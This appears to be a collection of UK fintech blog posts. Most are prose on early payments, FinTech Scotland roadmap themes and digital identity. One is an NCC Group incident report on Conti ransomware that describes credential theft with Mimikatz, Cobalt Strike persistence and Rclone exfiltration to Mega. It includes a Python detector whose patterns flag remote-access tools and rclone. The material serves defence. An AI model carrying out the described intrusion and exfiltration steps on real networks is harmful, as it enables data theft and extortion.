Why early payments could be the key to strengthening supply chains

Why early payments could be the key to strengthening your supply chain

Having a strong supply chain is one of the most powerful tools you can have in your arsenal. Creating a solid network of all the organisations involved in delivering your product or service to your end customer – from vendors to producers, warehouses to retailers – is critical to keeping things running smoothly. In fact, it can make or break your success.

But if there’s one factor that can help boost and strengthen supply chains, across all sectors and industries, that often gets overlooked, it’s the power of early payments.

Here’s why they could be the key to making your supply chain even stronger.

 

Building confidence and trust

It might sound simple, but don’t underestimate the importance of having confidence in and being able to trust each and every member of your supply chain. Early payments can help build this confidence – for both suppliers and customers alike.

If you’re a buyer, offering to pay early (for example in return for a small discount), signifies that you’ve got the cash ready and waiting, and are considerate of the fact that your supplier might benefit from a boost to their cash flow before the date their invoice is due.

For suppliers, being able to incentivise your customers to pay early by offering a small discount signals sound financial wellbeing. If you’re able to offer your services or products at a beneficial cost, it implies you’re not stretched to the last penny – which gives customers confidence and reassurance that you’re not at risk and they’ll be able to keep buying from you.

 

Access to better deals

It goes without saying that, if early payment benefits both buyer and supplier, there could be great deals attached to paying up early. When either side is empowered to use early payment as a tool for negotiation – whether that’s a reduction in price, a speedier delivery, or another mutually agreed benefit – it can help move things along exponentially, and might even lead to longer term process changes in your supply chain that keep things really efficient and effective.

 

Reputation builder

If you’re a buyer that’s offering to pay early, you’re going one step further than avoiding a reputation as a nightmare customer that your supplier has to keep chasing: you’ll become a preferred choice.

When suppliers are stretched or at capacity, they’ll be in a position to choose who they work with. Customers or buyers with good reputations for paying on time (or, even better, early) are much more likely to make their way up the food chain of preference – and might even attract more suppliers looking to work with them, as a result of word of mouth, too.

 

Growth on both sides

It’s no secret that, for the SMEs and start-ups that form a bulk of the UK’s suppliers, cash is king. Offering early payment can be a real cash injection that helps SMEs out with their cashflow. And good cashflow means more money to invest and grow.

But the benefits aren’t one sided. If you’re a buyer that’s looking to grow, you’ll need your suppliers to be able to keep up with your ambitions – which will likely lead to an increased demand for goods or services. By paying them early and helping them grow, you’ll be helping them to help you grow, when the time comes.

 

Only as strong as your weakest link

When it comes down to it, your supply chain is only as strong as its weakest link – and late payment has a habit of breaking the bonds that the chain relies on. In fact, according to a recent survey of 500 UK decision makers, 86% agreed that one single late payment affects everyone in the supply chain. And, out of the 31% of businesses that admitted paying a supplier late, almost half say it was due to a late or failed payment from their customer.

So, if late payment has a knock-on, negative impact on everyone in a supply chain, imagine the knock-on, positive impact that early payment could have, if things were reversed?

 

How Early Pay can help

If reading this has convinced you that building early payment into your supply chain is something you should be looking at, you’re in the right place.

Our CEO, Anthony Persse, thinks it’s time to turn the conversation about late payment on its head: “By shifting towards a more positive conversation about ‘early payment’, we will do much more than simply improve payment performance. We will help create more jobs, deliver greater levels of investment and generate deeper social value with long-term sustainability at a time when the country needs it most.”

If you’d like more information visit saltare.io, or please get in touch with the team at Info@saltare.io and we’ll be happy to help.

 

Mars mission technology can improve team meetings for introverts

Recruiting a cognitively diverse workforce is essential for productivity, creativity and innovation.  People who think differently, however, also prefer to communicate differently in the workplace, too.  Introverts, for example, typically prefer to take time to think before contributing. Introverts think to talk whereas extroverts talk to think.  So in a normal meeting, whether virtual or face to face, the microphone will tend to be dominated by the more extroverted team members and most of the good ideas from the more introverted team members will be lost.

Our approach to this problem has been to create a workplace collaboration tool for remote meetings using technology developed for astronauts in future deep space exploration missions, successfully tested with NASA and the UK space agency.

Mars is always at least 150 times further away than the Moon and sometimes over 1,000 times further away.  The distances are so vast that the radio waves or lasers which will carry the signals will take many minutes to cross the void. The delay will vary with distance but for a crew on Mars it will always be over 3 minutes one-way delay and sometimes over 20 minutes.

The delay cannot be reduced – that is set by the laws of physics – but by splitting dialog into different threads, or braids, and presenting them in a novel way we can make it feel to spaceflight crew and mission control that they are communicating normally.

Using the novel structure and rhythm required for effective remote communication in deep space also produces the opportunity for a new way of interacting during team meetings on Earth.  Every participant has an exactly equal chance to contribute to the discussion.  Lessons learned from developing human deep space communication technology have the potential to redesign workplace practices to be more inclusive for introverts and other groups, delivering better, more effective, meetings, benefitting the whole team and broader organisation.

For more information, please visit braided.space

Financial Regulation – the opportunity for FinTech Research & Innovation

Article written by Julian Wells, Director at Whitecap Consulting

FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and is discussing the key outputs in a series of blogs. This blog focuses on Financial Regulation, which is one of the four key strategic priority themes.

The UK’s approach to financial regulation has been key in enabling a dynamic financial services sector that supports and drives the economy, enables a progressive economic outlook, creates jobs, and plays a significant role as a global financial service centre.

The development of this Roadmap highlighted financial regulation as a priority theme because of its fundamental role in FinTech and financial services, as well as the need for financial regulation to support the positive role FinTech innovation could play in the future of finance.

Regulation remains extremely complex for all those operating in the finance industry. Depending on the complexity of the financial institution’s business model, meeting compliance obligations can mean significant costs.

Industry research suggests that some of the largest global financial institutions are spending up to 5% of revenue on regulatory compliance. Across the UK this could mean the annual cost of demonstrating regulatory compliance is as much as £6.6 billion.

Throughout the development of the Roadmap, contributors highlighted their interest in the role technologies could play in future financial regulation. Some examples are AI, advanced analytics, high performance computing including quantum computing, and distributed ledger technologies.

 

Priority areas in Financial Regulation

The industry contributors to this roadmap offered a view that the future looks set for significantly more change. Our analysis highlighted three topics of interest:

Simplifying compliance

Helping financial institutions create new solutions and use FinTech to help meet current, continuously changing, and global regulatory obligations.

Future risk modelling and risk management

Reinventing risk management with technology and data analytics, and enabling new approaches to fight financial crime, address fraud and focus on emerging climate risks.

  • Reinventing risk management with technology and data analytics
  • Enabling new approaches to address fraud and fight financial crime
  • Modelling for new and emerging climate risks

Future regulation design

Enabling an agile regulatory framework that works for all, and developing future regulatory oversight or supervisory technology.

  • Regulatory reporting
  • Interoperability and data standardisation

Roadmap next steps: Financial Regulation

A range of proposed next steps are laid out in the published Roadmap, which specifically identifies 13 actions relating to Financial Regulation, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. The report also references 23 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

More information about FinTech Scotland’s Research & Innovation Roadmap can be found here, where the full Roadmap can also be downloaded.

The Identity Tooling Needed for Institutional Adoption of DeFi

Blog written by Kai Jun Eer, founder of fintech Onboard ID


In the past year, the term Web3 has become an increasingly used buzzword. The growth in different blockchain protocols and metaverse projects seems to have shed light on what the new Web3 might look like. We are at the forefront of technology innovation, and we are really excited about it. Yet, it is important to remember that Web3 is not just about crypto and the metaverse, but about how we define a more user-centric internet. Behind every shining DeFi protocol or NFT project, there is an infrastructural layer supporting them.

Most of the current decentralised finance (DeFi) protocols are pseudonymous in nature (meaning each user is tied to an identifier but not to their real world identity). As these protocols start to grow into institutional adoption, inevitably they will need to comply with certain institutional regulations. One example is that some users might now need to undergo Know-Your-Customer (KYC) verification in order to continue interacting with these institutions through the DeFi protocols. I envision that as DeFi matures, the underlying protocol that facilitates the settlement / transactions would be fully decentralised and trustless, while specific use cases can be built on top of the protocol where some might introduce regulations.

A concrete example is Aave, one of the largest DeFi protocols deployed on multiple blockchains such as Ethereum and Avalanche. Aave first started out as a decentralised lending and borrowing protocol. Earlier this year, Aave launched a permissioned protocol (Aave Arc) that targets institutional adoption. The benefits that a blockchain can bring to speed up efficiency of financial settlements do not have to be limited to a fully decentralised setting. However, users that interact with Aave Arc have to undergo KYC in order to meet regulatory requirements.

As more DeFi protocols become regulated in order to expand their markets to financial institutions, does that mean that as an end user, each time I want to access a different protocol, I have to undergo a KYC verification again and again? Besides not being user-friendly, it makes an already high barrier to entry in DeFi even less accessible.

A digital identity might help. Imagine if an end user only has to undergo the KYC process once, after which they receive a digital identity which can subsequently be presented to the different DeFi protocols. With increasing awareness of data privacy and data ownership, users want to be in control of their own data. As an end user, I no longer want to delegate my identity data to a centralised data custodian (think Google ID), especially sensitive data such as what financial services I am accessing. There is a need for a privacy-preserving identity solution, which provides convenience yet remains user-centric.

At Onboard ID, we are building the next generation identity tooling, where users are always in control of their own data. Once a user has undergone the usual KYC verification, it receives a cryptographic digital credential which contains the user’s verified identity data. The identity data is only stored in the user’s mobile phone and not in any central databases. An identifier of the credential is recorded on a public permissionless blockchain, such that when the user presents its credential, it is verifiable that the identity data in the credential comes from the trusted KYC provider. The reason our solution is user-centric is that during KYC reverification, data transfer only happens between the user and the verifier without passing through any third parties, not even us as the infrastructure provider. Therefore, users are always in control of how they want to share these data and with whom.
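The anchoring pattern described above can be sketched as follows. This is an added example, not Onboard ID's code: it assumes the on-chain identifier is a salted SHA-256 hash of the credential, models the blockchain as an in-memory `Ledger` class, and uses hypothetical names throughout (`issue`, `verify`, `kyc-provider-1`).

```python
import hashlib
import json
import secrets

SALT_BYTES = 32  # random salt kept with the credential on the user's device


class Ledger:
    """Stand-in for the public chain: identifier -> issuer that anchored it.

    Assumption: on a real chain the issuer id would be the address that
    sent the anchoring transaction, authenticated by the chain itself.
    """

    def __init__(self):
        self._anchors = {}
        self._revoked = set()

    def anchor(self, issuer_id, identifier):
        if identifier in self._anchors:
            raise ValueError("identifier already anchored")
        self._anchors[identifier] = issuer_id

    def revoke(self, issuer_id, identifier):
        if self._anchors.get(identifier) != issuer_id:
            raise PermissionError("only the anchoring issuer can revoke")
        self._revoked.add(identifier)

    def lookup(self, identifier):
        return self._anchors.get(identifier), identifier in self._revoked

    def public_view(self):
        """Everything an outside observer of the chain can read."""
        return dict(self._anchors)


def identifier_of(credential):
    """Salted hash over canonical JSON of the claims.

    The salt stops an observer from confirming guesses about low-entropy
    KYC data (name, date of birth) against the public identifier.
    """
    salt = bytes.fromhex(credential["salt"])
    if len(salt) != SALT_BYTES:
        raise ValueError("unexpected salt length")
    canonical = json.dumps(credential["claims"], sort_keys=True,
                           separators=(",", ":"))
    return hashlib.sha256(salt + canonical.encode("utf-8")).hexdigest()


def issue(ledger, issuer_id, claims):
    """KYC provider side: only the identifier is published."""
    credential = {"claims": dict(claims),
                  "salt": secrets.token_bytes(SALT_BYTES).hex()}
    ledger.anchor(issuer_id, identifier_of(credential))
    return credential  # handed to the user, stored on their phone


def verify(ledger, credential, trusted_issuers):
    """Verifier side: receives the credential directly from the user."""
    try:
        identifier = identifier_of(credential)
    except (KeyError, TypeError, ValueError):
        return False, "malformed credential"
    issuer, revoked = ledger.lookup(identifier)
    if issuer is None:
        return False, "not anchored"  # unknown, or claims were altered
    if issuer not in trusted_issuers:
        return False, "untrusted issuer"
    if revoked:
        return False, "revoked"
    return True, "ok"


if __name__ == "__main__":
    chain = Ledger()
    # Constructed sample identity data.
    cred = issue(chain, "kyc-provider-1",
                 {"name": "A. Sample", "date_of_birth": "1990-01-01"})
    print(verify(chain, cred, {"kyc-provider-1"}))
```

The sketch does not bind the credential to the person presenting it; anyone holding a copy passes `verify`, so a deployed scheme also needs a holder key and a signed challenge at presentation time.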

We are currently in beta testing. If your organisation is looking to get an edge in streamlining KYC reverifications, whether it’s in the fintech sector, looking to get into DeFi, or other more specific use cases, please get in touch at kaijuneer@gmail.com! Our vision is to contribute towards building a more user-centric internet, and we hope you could come onboard with us.

Protecting your tech startup against Conti type ransomware

Blog written by Alex Jessop, Managing Security Consultant (CIRT)  at NCC Group


Background

March saw a 53% increase in ransomware attacks on February, continuing the upward trend for 2022. Conti were the second most prolific group, responsible for 27.52% of the ransomware attacks occurring worldwide[1]. FS-ISAC, in their “Navigating Cyber 2022” report, stated that with the observed trends over recent years, ransomware will remain a top cyber threat to financial institutions[2].

Conti are just another in a long line of Advanced Persistent Threat (APT) actor groups that are targeting organisations for monetary gain. While their arsenal may have some custom tooling, the majority of the Tactics, Techniques and Procedures (TTPs) are well known and used by multiple APT groups. A large proportion of incidents observed by NCC Group would have easily been prevented if policies had been followed or proactive measures taken to understand weaknesses in the environment.

Taking the following three steps will drastically reduce the likelihood of a successful compromise:

  • Robust patch management policy
    • The majority of initial access vectors observed in Conti attacks would be mitigated
  • Enforcing principle of least privilege[3]
    • Restricting user permissions would reduce the likelihood of post-exploitation if initial access is gained
  • Restricting internet access on servers
    • Connectivity is key to threat actors and would make a compromise substantially more difficult if the server estate could not communicate openly with the internet

 

Executive Summary

In February 2022, a Twitter account which uses the handle ‘ContiLeaks’ started to publicly release information for the operations of the cybercrime group behind Conti ransomware. The leaked data included private conversations between members along with source code methods of delivery. Furthermore, even though the leaks appeared to have a focus on the people behind the Conti operations, the leaked data confirmed (at least to the public domain) that the Conti operators are part of the group which operates under the ‘TheTrick’ ecosystem. For the past few months, there was a common misconception that Conti was a different entity.

Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware. The aim of this article is to describe the methods and techniques we observed during recent incidents that took place after the leaked data.

Our findings can be summarised as below:

  • Multiple different initial access vectors have been observed.
  • The operator(s) use service accounts of the victim’s Antivirus product in order to laterally move through the estate and deploy the ransomware.
  • After getting access, the operator(s) attempted to remove the installed Antivirus product.
  • To achieve persistence in the compromised hosts (maintain access), multiple techniques were observed:
    • Service created for the execution of Cobalt Strike.
    • Multiple legitimate remote access software tools found. These include ‘AnyDesk’, ‘Splashtop’ and ‘Atera’.
    • Local admin account ‘Crackenn’ created. (Note: This has been previously reported by Truesec as a Conti behaviour[4])
  • Before starting the ransomware activity, the operators are known to have exfiltrated data from the network with the legitimate software ‘Rclone’[5].

It should be noted that the threat actor(s) might use different tools or techniques in some stages of the compromise.

 

Initial Access

Multiple initial access vectors have been observed recently: phishing emails and the exploitation of Microsoft Exchange servers. The phishing email, which was delivered to an employee, proceeded to download and install malware which gave the threat actor direct access to the host.

The targeting of Microsoft Exchange saw ProxyShell and ProxyLogon vulnerabilities exploited. This gave threat actors direct access to the Exchange servers. When this vector was observed, the compromise of the Exchange servers often took place two to three months prior to the post exploitation phase.

Other initial access vectors utilised by the Conti operator(s) are:

  • Credential brute-force
  • Use of publicly available exploits. We have observed the following exploits being used:
    • FortiGate VPN
    • Log4Shell
  • Phishing e-mail sent by a legitimate compromised account, including email accounts of trusted partners

 

Discovery and Lateral Movement

Once a threat actor has gained access to a host on the network, the threat actor deploys tooling or executes Windows commands to identify hosts on the estate and potential pathways to their objectives.

Typically they begin with network scanning tools to build a picture of the estate and identify what is accessible from the host they currently have access to. Next they will use Windows domain discovery tools to identify users on the domain, as well as user groups which will assist in escalating their privileges.

Lateral movement is usually performed by either:

  • Use of Remote Desktop Protocol (RDP) to log onto hosts remotely
  • Access across open network shares to copy and execute malware

This phase often occurs within hours or days of initial access being gained.

Persistence

The threat actor leveraged Windows Services to add persistence for the Cobalt Strike beacon. Cobalt Strike is a popular tool for adversary simulation and was the main command and control framework utilised by this group.

In addition, services were also installed to provide persistence for the Remote Access Tools deployed by the threat actor:

  • AnyDesk
  • Splashtop
  • Atera

Local accounts have also been created by the threat actor on patient zero to maintain access.

 

Privilege Escalation

Conti operator(s) managed to escalate their privileges by compromising and using different accounts that were found in the compromised host. In engagements undertaken by NCC, the credentials were found to have been compromised through the use of tools such as Mimikatz, a well-known tool for extracting credentials from running processes.

One operator was also observed exploiting ZeroLogon to obtain credentials and move laterally.

 

Exfiltration and Encryption

Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software ‘Rclone’. ‘Rclone’ is a legitimate file transfer tool which is used to manage files on cloud storage or a private file server. When cloud storage is used, Mega is the option chosen by this group.

Soon after the data exfiltration, the threat actor(s) started the data encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days.

As discussed previously, the average dwell time of a Conti compromise is heavily dependent on the initial access method. In those incidents that have involved ProxyShell and ProxyLogon, the time between initial access and lateral movement has been three to six months. However, once lateral movement is conducted, the time to completing their objective is a matter of days.

 

Recommendations

  • Monitor firewalls for traffic categorised as filesharing
  • Monitor firewalls for anomalous spikes in data leaving the network
  • Patch externally facing services immediately
  • Monitor installed software for remote access tools
  • Restrict RDP and SMB access between hosts
  • Implement a Robust Password Policy[6]
  • Provide regular security awareness training
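The monitoring recommendations above can be turned into simple host-log rules for the persistence and exfiltration behaviours described in this article. The following is an added example, not NCC Group tooling: it assumes Windows events have been exported as flat dictionaries using the standard event field names, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Remote access tools named in the article. The leading word boundary
# avoids matching unrelated words that contain "atera" (e.g. "lateral").
RAT = re.compile(r"\b(anydesk|splashtop|atera)", re.IGNORECASE)
RCLONE = re.compile(r"\brclone(\.exe)?\b", re.IGNORECASE)
BUILTIN_ADMINISTRATORS_SID = "S-1-5-32-544"  # locale-independent group id


def detect(events, approved_tools=frozenset()):
    """Return (host, rule, detail) findings in event order.

    approved_tools: lower-case tool names the organisation uses itself.
    """
    findings = []
    new_accounts = {}  # (host, account SID) -> account name, from 4720
    for ev in events:
        host, eid = ev["host"], ev["event_id"]
        if eid == 7045:  # a service was installed
            text = f'{ev.get("ServiceName", "")} {ev.get("ImagePath", "")}'
            tools = {m.lower() for m in RAT.findall(text)}
            for tool in sorted(tools - set(approved_tools)):
                findings.append((host, "remote-access-service", tool))
        elif eid == 4720:  # a user account was created
            new_accounts[(host, ev["TargetSid"])] = ev["TargetUserName"]
        elif eid == 4732:  # a member was added to a local group
            key = (host, ev["MemberSid"])
            if (ev["TargetSid"] == BUILTIN_ADMINISTRATORS_SID
                    and key in new_accounts):
                findings.append((host, "new-local-admin", new_accounts[key]))
        elif eid == 4688:  # process creation (needs command-line auditing)
            cmd = f'{ev.get("NewProcessName", "")} {ev.get("CommandLine", "")}'
            if RCLONE.search(cmd):
                detail = "rclone to mega" if "mega" in cmd.lower() else "rclone"
                findings.append((host, "rclone-execution", detail))
    return findings


def triage(findings):
    """Hosts ordered by how many distinct rules fired, most first."""
    rules = defaultdict(set)
    for host, rule, _ in findings:
        rules[host].add(rule)
    return sorted(((h, sorted(r)) for h, r in rules.items()),
                  key=lambda item: (-len(item[1]), item[0]))


# Constructed sample events (host names, SIDs and paths are made up).
NEW_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
SAMPLE_EVENTS = [
    {"host": "FS01", "event_id": 7045, "ServiceName": "AnyDesk",
     "ImagePath": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service'},
    {"host": "WS07", "event_id": 7045, "ServiceName": "SplashtopRemoteService",
     "ImagePath": r"C:\Program Files (x86)\Splashtop\SRService.exe"},
    {"host": "FS01", "event_id": 4720, "TargetUserName": "Crackenn",
     "TargetSid": NEW_SID},
    {"host": "FS01", "event_id": 4732, "MemberSid": NEW_SID,
     "TargetSid": BUILTIN_ADMINISTRATORS_SID},
    # Existing account added to Administrators: not a *new* local admin.
    {"host": "DC01", "event_id": 4732,
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1001",
     "TargetSid": BUILTIN_ADMINISTRATORS_SID},
    {"host": "WS07", "event_id": 4688,
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"host": "FS01", "event_id": 4688,
     "NewProcessName": r"C:\ProgramData\rclone.exe",
     "CommandLine": r"rclone.exe copy \\FS01\Finance mega:archive"},
]

if __name__ == "__main__":
    for host, rules in triage(detect(SAMPLE_EVENTS)):
        print(host, rules)
```

A host that trips several rules within a short window, as FS01 does here, matches the sequence the article describes and should be triaged first; name-based matching will miss a renamed binary, so pair it with the firewall monitoring listed above.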

References

  1. https://www.mynewsdesk.com/nccgroup/news/ncc-group-monthly-threat-pulse-march-2022-446743
  2. https://www.fsisac.com/navigatingcyber2022-report?utm_campaign=2022-GIOReport&utm_source=media&utm_medium=PressRelease
  3. https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models
  4. https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks
  5. https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
  6. https://www.ncsc.gov.uk/collection/passwords/updating-your-approach


Payments & Transactions, the fintech opportunity

Article written by Julian Wells, Director at Whitecap Consulting

FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and is discussing the key outputs in a series of blogs. This blog focuses on Payments & Transactions, which is one of the four key strategic priority themes.

 

The way we pay for things is changing. Throughout the development of the Research & Innovation Roadmap, payments and transactions were referred to in the broad context of the transfer of value (either money, goods, or assets) in exchange for goods and services.

The Roadmap pinpoints the significant move from physical exchanges to digital transactions, and identifies several significant trends that could mean payments will change significantly in years to come. These changes will have a significant impact on the economy, and could also have a substantial impact on citizens and businesses, which is why the future of payments is one of the four priority themes identified.

 

The importance of Payments & Transactions

The pandemic accelerated the move from physical to digital in many aspects of our lives, including how we make transactions. Customers’ digital expectations and a shift towards more instant electronic payments are having a significant impact on our economy, and a new digital economy is emerging strongly, with major implications for consumers and SMEs alike.

Across the development of the Roadmap, when looking at the theme of the future of payments we considered the topic of digital currencies and cryptocurrencies. These innovations present new ways for value to be stored and exchanged. It is clear there is still a lot to learn about the potential, the impact, and the implications of cryptocurrencies as a method for mainstream payments. Stablecoin is a form of cryptocurrency that is linked to an asset that is stable in value, and stablecoins are generating significant interest for future payments and value exchange.

The UK Government has established a crypto assets taskforce, and the UK regulators are considering the benefits and risks on a range of issues connected to this topic, including a separate digital currency backed by a central bank. Since the publication of the Roadmap, HM Treasury has confirmed its commitment to the development of appropriate regulation for crypto.

As we further explored the payments theme, we identified technologies of particular interest, such as AI, blockchain and distributed ledger tools. Industry expressed interest about how these technologies could offer a completely different way to organise and manage payment systems, providing a route to real-time, cross-border payments worldwide. These developments pave the way for a potentially very different future of value exchange. According to the World Economic Forum, up to 10% of global GDP could be stored on blockchains by 2025.

Embedded payments is one of the hottest topics in FinTech in 2022, and was another area of particular focus. Technology is advancing the methods to embed payments in everyday experiences and allow customers and businesses to pay for purchases without entering bank details, credit, or debit card information.

Historically, the payments process has lived at the edges of experience for businesses. Payments were either taken in cash, or offline, with no real lasting insights into the customer and the goods or services they purchased. Technology businesses are now fully embedding software that enables a change to this experience, creating more choice and allowing businesses to have a deeper connection with customers. In addition to high profile examples such as Uber, many embedded payment innovations are emerging, such as in-car payments, smart fridges and connected homes.

Priority areas in Payments & Transactions

The industry contributors to this roadmap offered a view that the future looks set for significantly more change. Our analysis highlighted three topics of interest:

Digital currencies
Potential new ways to pay and transact in the future, with underlying technologies that could provide new foundations for the future of value exchange:
  • Cryptocurrencies and stablecoins
  • Distributed ledger technology
Embedded payments
Integrating frictionless payments into everyday activities, enabled by smart technology, and potentially driven by changing consumer expectations:
  • SME market
  • Retail consumers
Security for digital payments
Building security, trust, and user protection through cyber security, protecting users from malicious activity, reducing the potential for financial crime, and promoting a secure and trusted digital payment environment:
  • Cyber security
  • Biometrics

 

Roadmap next steps: Payments & Transactions

A range of proposed next steps are laid out in the published Roadmap, which specifically identifies 10 actions relating to Payments & Transactions, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. The report also references 23 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

More information about FinTech Scotland’s Research & Innovation Roadmap can be found here, where the full Roadmap can also be downloaded.

MyIdentity and Improving Identity Verification

Department for Digital, Culture, Media and Sport (DCMS) and the Digital Identity & Attributes Trust Framework (DIATF)

The Government wants to improve how digital identity is done and demonstrate what a ‘good’ digital identity should look like. As such, the DCMS has made a number of commitments to create a framework for what a good digital identity should look like. They will establish a Governance function to own these rules and make sure that they are followed and develop proposals to remove legislative and regulatory ‘blockers’ for the use of secure identities, whilst ensuring the protection of citizens.

Underneath the DIATF are a number of identity schemes, each aligned to the DCMS Framework and working to ensure interoperability, as each scheme will have its own nuances to meet the specific needs of its sector.

Etive have been working on the design and development of a scheme for the home buying and selling process since 2018, followed by two rounds of public funding, first from Scottish Enterprise and then Innovate UK.

 

Is there a problem with identity in the home buying and selling process?

The home buying and selling process is a long transaction built on trust between relying parties – estate agents, conveyancers, brokers and lenders.  Each is regulated differently and works to often competing standards and consequently each is not allowed to trust and rely on the identity verification (IDV) carried out by the other.

This has resulted in consumers having to prove their identity up to 5 times through the process, often using different information at different times. This causes great frustration, friction and cost for consumers, as well as relying parties. As one consumer responded, ‘ID checks are currently a joke, I have provided 12 different forms of ID and problems with them all’.

We should also not forget that due to events since 2020, with less face-to-face interactions, there is a greater reliance on digital IDV methods and property and mortgage fraud continues to rise.

 

MyIdentity Trust Scheme & Regulations

The solution is the development of a trust scheme enabling a consumer to get the IDV done once, which they own, and can share to all relying parties.

The MyIdentity scheme is based on the principles of the DCMS Framework and the Good Practice Guide 45 (GPG45; How to prove and verify someone’s identity). To ensure compliance with Anti-Money Laundering (AML) and compliance for firms, AML regulations were updated in 2019 enabling firms to use an IDV carried out by a certified third party so long as ‘…it is accredited or certified to offer the identity verification service through a governmental or industry process that involved meeting minimum published standards’.

These third parties are identity service providers (IDSPs) and since January 2022 approximately 45 organisations are going through the DCMS certification process. Liability has also shifted onto these IDSPs.

 

Financial Services and MyIdentity

The MyIdentity scheme is participating in the FCA’s regulatory sandbox, enabling firms to test innovative offerings in a live environment and provides FCA regulated firms with the protections that they need to embrace the Government and MyIdentity standards.

MyIdentity is also working through UK Finance to get MyIdentity into a position where lenders will accept a MyIdentity IDV, and on how financial organisations can re-use these IDVs for all financial services: a re-usable identity, which is a DCMS objective.

Further work is being done to help remove the blockers for other cohorts involved in the sales process such as conveyancers and brokers who rely on the ‘lender’s handbooks’ from both UK Finance and the Building Societies Association (BSA).

 

MyIdentity Outcomes

The Beta stage of the project is testing processes and technology looking at improved IDV standards, regulation of providers and greater protections for consumers and the industry.

If we look at Norway, for example, when they developed their trust network, BankID, fraud reduced from 2% of financial transactions to 0.00042% and mortgage lending times reduced to 1 day.

Great work is being done by the industry, coming together, to help improve the process of home buying and selling, which is also a policy objective of the Department for Levelling Up, Housing and Communities (DLUHC).

FinTech Research & Innovation for Climate Finance

FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and is discussing the key outputs in a series of blogs. This blog focuses on Climate Finance, which is one of the four key strategic priority themes.

The impact of climate change across the world is disrupting national economies and affecting lives. It requires urgent action from all to address the growing issue.

In its 2020 Global Risks report, the World Economic Forum highlights that the risk signals show the horizon for addressing climate risks has shortened. For the first time in the history of the report, the top five risks that it outlines are in a single category: ‘climate environmental change’.

In the Research & Innovation Roadmap, we use the term Climate Finance to describe the role that finance, technology and data can play in addressing the climate change crisis and powering a sustainable future.

 

The importance of Climate Finance

Enabling a more sustainable future was a prominent theme throughout the research for the development of the Roadmap. Throughout our analysis, the influence of finance together with the potential for exponential change through technologies was thought to be a powerful combination to help the necessary transition to a carbon neutral economy.

In the UK, financial regulators are aiming to influence positive climate outcomes through a series of new expectations, rules and guidance. The Bank of England is working to encourage an early and orderly transition to a carbon neutral economy and to “play a leading role, through policies and operations, in ensuring the financial system, the macroeconomy, and the Bank are resilient to the risks from climate change and supportive of the transition to a net zero economy.”

The Financial Conduct Authority also has a sustainable finance strategy, aiming to build greater transparency and trust, developing guidance and tools to provide mutual support to address the challenges of climate change.

Climate Finance is a complex matter. Our research with FinTech Scotland showed that it connects many things, including:

  • Investment
  • Regulatory change
  • Better data
  • Advanced analytics
  • A deeper understanding of consumer behaviours and consumer engagement
  • A deeper understanding of new technologies, biodiversity, carbon, and carbon markets

The challenge ahead is huge. Nevertheless, the research behind the Roadmap pinpointed three priority areas where further FinTech research and innovation could advance progress by helping nations adapt to the impact of climate change, manage the risks of transition and lead to them becoming greener, more resilient and more inclusive. All three offer Scotland and the UK an opportunity to use strengths in research and innovation, and to build collaborative action across the FinTech and finance industry and the research community.

Priority areas in Climate Finance

Environment, Social, Corporate Governance (ESG) data.

Assessing the current situation and outlining the ambition for new data sources, clearer standards and advanced analytics to build greater trust and transparency in the sustainable claims made by finance and business.

  • ESG reporting
  • Investor confidence
  • ESG data
  • SME market

Carbon markets and carbon offsetting

Considering the role that each plays in realistically transitioning to a net zero low-carbon economy while exploring the technologies and innovation that could drive further progress.

  • Voluntary carbon markets
  • Carbon offsetting

Facilitating a net zero economy

Moving beyond finance-as-usual practices. Using innovation and technology to reinvent financial markets and stimulate the change needed to support a healthier planet.

  • Investment decisions for net zero
  • Circular economy
  • Housing
  • Insurance
  • SME market

Roadmap next steps: Climate Finance

A range of proposed next steps is laid out in the published Roadmap, which specifically identifies 8 actions relating to Climate Finance, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. The report also references 25 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

More information about FinTech Scotland’s Research & Innovation Roadmap can be found here, where the full Roadmap can also be downloaded.

Research & Innovation opportunity in Open Finance data

Article written by Julian Wells, Director at Whitecap Consulting


FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and is discussing the key outputs in a series of blogs. This blog focuses on Open Finance data, which is one of the four key strategic priority themes.

In the first blog in this series, we discussed the purpose, value and impact of a Research & Innovation Roadmap. In this blog, we discuss Open Finance data which is a strategic priority itself but also a facilitator of FinTech innovation in wider areas, and an enabler for the three other strategic priority themes in the Roadmap.

The other three themes are Climate Finance, Payments & Transactions, and Financial Regulation, each of which will be the subject of a subsequent blog in this series.

Open Finance data has the potential to significantly change consumers’ and businesses’ engagement with finance, and to deliver better outcomes. It spans the whole suite of financial products and services as we understand them today, including banking, savings, mortgages, pensions, investments, insurance, lending, and payments.

 

How can Research & Innovation support the development of Open Finance?

To help Open Finance achieve its potential, more leadership, actionable research, and innovation is required. FinTech Scotland’s Research & Innovation Roadmap sets out specific actions to help drive this opportunity, through a collective approach that involves industry, innovators and researchers, to create the future of finance.

